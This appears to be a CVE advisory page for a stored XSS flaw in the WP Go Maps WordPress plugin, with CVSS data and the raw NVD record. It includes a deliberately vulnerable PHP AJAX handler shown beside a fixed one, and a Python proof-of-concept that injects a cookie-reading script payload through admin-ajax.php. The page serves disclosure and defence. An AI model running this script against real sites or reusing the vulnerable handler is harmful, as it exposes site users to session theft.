Security Vulnerability Report
CVE-2025-11307 CVSS 8.8 HIGH

Published: 2025-11-11 06:15:35
Last Modified: 2026-04-15 00:35:42

Description

The WP Go Maps (formerly WP Google Maps) WordPress plugin before 9.0.48 does not sanitize user input provided via an AJAX action, allowing unauthenticated users to store XSS payloads which are later retrieved from another AJAX call and output unescaped.
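The pattern the description sketches, written out as an added illustration that is not WP Go Maps code and does not name the plugin's real endpoints: a write handler registered on both `wp_ajax_` and `wp_ajax_nopriv_` hooks (so anonymous visitors can reach it) that stores raw `$_POST` data, and a second handler that echoes the stored value as HTML. The hardened version beside it drops the unauthenticated write hook, adds a nonce and capability check, sanitizes on input and escapes on output. The action names (`example_save_label`, `example_get_label`), the option key and the `label` field are assumptions for the example.

```php
<?php
// Added example (not WP Go Maps code): the vulnerable pattern described in
// CVE-2025-11307 next to a hardened version. Action names, option key and
// field names are hypothetical.

/* ---- Vulnerable pattern ---------------------------------------------- */

// Both hooks fire, so logged-in and anonymous visitors alike can reach
// /wp-admin/admin-ajax.php?action=example_save_label.
add_action( 'wp_ajax_example_save_label', 'example_save_label_vulnerable' );
add_action( 'wp_ajax_nopriv_example_save_label', 'example_save_label_vulnerable' );

function example_save_label_vulnerable() {
    // No nonce, no capability check, no sanitization: raw request data is
    // written straight to the options table.
    $label = isset( $_POST['label'] ) ? $_POST['label'] : '';
    update_option( 'example_map_label', $label );
    wp_send_json_success();
}

add_action( 'wp_ajax_example_get_label', 'example_get_label_vulnerable' );
add_action( 'wp_ajax_nopriv_example_get_label', 'example_get_label_vulnerable' );

function example_get_label_vulnerable() {
    // The second AJAX call echoes the stored value as HTML without escaping,
    // so a stored <script> tag runs in the browser of whoever loads it.
    echo '<div class="map-label">' . get_option( 'example_map_label', '' ) . '</div>';
    wp_die();
}

/* ---- Hardened version -------------------------------------------------- */

// Writes are registered for authenticated users only; the nopriv hook is gone.
add_action( 'wp_ajax_example_save_label', 'example_save_label_fixed' );

function example_save_label_fixed() {
    // CSRF protection: the caller must present a nonce issued for this action
    // (created with wp_create_nonce( 'example_save_label' ) on the calling page).
    check_ajax_referer( 'example_save_label', 'nonce' );

    // Authorization: only users allowed to manage options may change the label.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Input sanitization: strip tags and control characters before storing.
    $label = isset( $_POST['label'] )
        ? sanitize_text_field( wp_unslash( $_POST['label'] ) )
        : '';
    update_option( 'example_map_label', $label );
    wp_send_json_success();
}

add_action( 'wp_ajax_example_get_label', 'example_get_label_fixed' );
add_action( 'wp_ajax_nopriv_example_get_label', 'example_get_label_fixed' );

function example_get_label_fixed() {
    // Output escaping at the point of use: even if bad data reached the
    // database through an older write path or a direct DB edit, it renders
    // as text rather than markup.
    $label = get_option( 'example_map_label', '' );
    echo '<div class="map-label">' . esc_html( $label ) . '</div>';
    wp_die();
}
```

The read handler stays reachable without login because reading a label is legitimately public; what matters is that the write path requires a nonce and a capability, and that escaping happens on output regardless of what the write path did. Sanitizing on input alone would not protect data that is already in the database when the patch ships.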

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Metric source
Secondary metric from source 134c704f-9b21-4f2e-91b3-4a467353bcc0; the raw record below carries no primary NVD score.

Configurations (Affected Products)

No CPE configuration data is present in the NVD record (vulnStatus: Deferred). Affected product according to the description:

WP Go Maps (WP Google Maps) < 9.0.48

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The AJAX action names it uses are placeholders: neither the NVD description nor the WPScan reference on this page names the vulnerable action, so the script needs the real endpoints substituted in before it can confirm anything.
python
import requests
import sys

# CVE-2025-11307 PoC - WP Go Maps Stored XSS
# Target: WordPress site with vulnerable WP Go Maps plugin (< 9.0.48)
# NOTE: the AJAX action names below are placeholders; adjust them to the
# actual endpoints before use.

TARGET_URL = "http://target-wordpress-site.com"
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"


def exploit_stored_xss():
    """Inject a payload via one AJAX action, then retrieve it via another."""
    ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"

    # Step 1: Inject XSS payload via the first AJAX endpoint.
    # The plugin does not sanitize user input, allowing arbitrary HTML/JS injection.
    inject_data = {
        'action': 'wpgmza_save_map',  # Example action, adjust based on actual endpoint
        'map_id': '1',
        'name': XSS_PAYLOAD,          # Unsanitized input stored in database
        'other_field': 'malicious_data',
    }
    try:
        response = requests.post(ajax_url, data=inject_data, timeout=10)
        print(f"[+] Payload injection response: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Injection failed: {e}")
        return

    # Step 2: Trigger XSS via the second AJAX endpoint.
    # The stored data is retrieved and output without escaping.
    retrieve_data = {
        'action': 'wpgmza_get_map',   # Example action, adjust based on actual endpoint
        'map_id': '1',
    }
    try:
        response = requests.get(ajax_url, params=retrieve_data, timeout=10)
        # A JSON response may encode "<" as "\u003c"; if the literal payload is
        # absent, also check the rendered page that consumes this endpoint.
        if XSS_PAYLOAD in response.text:
            print("[+] XSS payload found in response - vulnerability confirmed!")
            print("[+] Payload will execute when the page is viewed by any user")
        else:
            print("[-] Payload not found - may require a different endpoint")
    except requests.exceptions.RequestException as e:
        print(f"[-] Retrieval failed: {e}")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    print(f"[*] Testing CVE-2025-11307 on {TARGET_URL}")
    exploit_stored_xss()

References

https://wpscan.com/vulnerability/f5b21a05-7a51-4530-9e07-4700f00eeca3/

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-11307",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-11T06:15:34.890",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The WP Go Maps (formerly WP Google Maps) WordPress plugin before 9.0.48 does not sanitize user input provided via an AJAX action, allowing unauthenticated users to store XSS payloads which are later retrieved from another AJAX call and output unescaped."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/f5b21a05-7a51-4530-9e07-4700f00eeca3/",
        "source": "[email protected]"
      }
    ]
  }
}